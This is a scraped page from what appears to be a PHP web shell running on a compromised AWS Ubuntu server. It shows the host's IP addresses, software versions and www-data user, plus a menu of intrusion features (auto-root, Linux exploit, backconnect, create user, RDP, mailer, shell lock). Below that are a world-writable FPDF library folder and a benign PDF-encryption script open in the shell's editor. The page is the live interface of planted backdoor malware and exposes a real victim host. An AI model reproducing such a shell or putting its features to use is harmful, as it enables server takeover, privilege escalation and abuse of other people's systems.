Linux ip-172-26-7-228 5.4.0-1103-aws #111~18.04.1-Ubuntu SMP Tue May 23 20:04:10 UTC 2023 x86_64
Apache
: 172.26.7.228 | : 3.148.145.219
Cant Read [ /etc/named.conf ]
5.6.40-24+ubuntu18.04.1+deb.sury.org+1
www-data
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
var /
www /
results /
jssum /
tarka_pdf /
[ HOME SHELL ]
Name
Size
Permission
Action
font
[ DIR ]
drwxrwxrwx
fpdi
[ DIR ]
drwxrwxrwx
tutorial
[ DIR ]
drwxrwxrwx
fpdf.css
1.29
KB
-rwxrwxrwx
fpdf.php
46.11
KB
-rwxrwxrwx
install.txt
983
B
-rwxrwxrwx
license.txt
326
B
-rwxrwxrwx
rotation.php
588
B
-rwxrwxrwx
setpdfPWD.php
726
B
-rwxrwxrwx
Delete
Unzip
Zip
${this.title}
Close
Code Editor : setpdfPWD.php
<?php function pdfEncrypt($origFile, $password, $destFile) { require_once('fpdi/FPDI_Protection.php'); $pdf =& new FPDI_Protection(); $pdf->FPDF(); $pagecount = $pdf->setSourceFile($origFile); // copy all pages from the old unprotected pdf in the new one for ($loop = 1; $loop <= $pagecount; $loop++) { $tplidx = $pdf->importPage($loop); $pdf->addPage(); $pdf->useTemplate($tplidx); } // protect the new pdf file, and allow no printing, copy etc and leave only reading allowed $pdf->SetProtection(array(), $password, ''); $pdf->Output($destFile); return $destFile; } /* $password = "info@domain.com"; $origFile = "book.pdf"; $destFile ="book_protected.pdf"; pdfEncrypt($origFile, $password, $destFile ); */ ?>
Close